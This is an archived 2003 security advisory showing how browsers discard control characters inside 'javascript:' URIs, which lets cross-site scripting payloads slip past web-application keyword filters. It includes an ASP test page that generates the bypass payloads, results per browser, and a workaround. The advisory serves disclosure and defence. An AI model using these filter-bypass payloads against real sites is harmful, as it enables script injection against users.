TUCoPS :: Web :: General :: bt767.txt

Passing script/html-filter with special chars (multibrowser)



ben moeckel security research - http://badWebMasters.net - security
advisories
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - 


badWebMasters security advisory #012:

	Passing script/html-filter with special chars (multibrowser)


Discovery date: 2003-07-16

Author: 

	ben moeckel (http://distressed.de)
	mailto: badwebmasters@online.de


Description:

	When webbrowsers parse html they remove special chars,
	this behavior may be used by an malicious user to fool 
	script/html-filters in webapplications.


Detail:

	badWebMasters showed in their advisory #011 how to pass
	the "Snitz Forums"-scriptfilter with the Tab-Char (09).
	After "Opera" and "Mozilla"-users noticed that the
	provided exploit didn't work on their system I decided
	to start some new testings, with an amazing result!

	To detect what kind of special chars can be used in html-
	parameters I set up the following asp-page:

	-------------------------------------------2.asp---------
	<%@LANGUAGE=JScript%><%

	%><script>function a(o){alert(o)}</script><%
	%><img src="javascript:a('test')" /><%

	for(i=0;i<256;++i){
		uc = "%"+chk(i.toString(16));
		%><img src="ja<%=unescape(uc)%>vascript:a(<%=i%>)" />
	<% }

	function chk(sInp){if(sInp.length<2){
		return String("0"+sInp)
	}else{return sInp}}
	%>
	---------------------------------------------------------

	The page has been viewed with Mozilla, Opera and Internet-
	Explorer, the alert-box poped up in this order:

		Mozilla 1.3.1 (Win32): 	0 (with restricions)

		Opera 7.11 (Win32): 	0, 9, 10, 13, 173

		Internet Explorer 5.0:	13, 10, 9, 0

	Mozilla doesn't allow the window.alert()-method in "javascript:"-
	images, so I had to use my own function "a()". It also returned 
	an error for char 9, 10 and 13: "Error: unterminated regular 
	expression literal".

	Webmasters may be carefull with char 173 (ADh) that can be used
	in Opera only.

	And last but not least silly Internet Explorer: reversed order!?


Test:

	http://badwebmasters.net/advisory/012/test.asp


Workaround:

	This advisory adresses all webapps that use a badword filter,
	make sure all control-chars are removed before badwords are 
	removed!


References: 

	badWebMasters advisory #011: Cross-Site-Scripting @ Snitz Forums
	- http://cert.uni-stuttgart.de/archive/bugtraq/2003/04/msg00247.html


Feedback: 

	Comments, suggestions, updates, anything else?
		-> mailto:badwebmasters@online.de


Source:

	http://badwebmasters.net/advisory/012/ (text/html)


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - 
Copyright 2003 by ben moeckel (Benjamin Klimmek) for badWebMasters.
http://badwebmasters.net

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH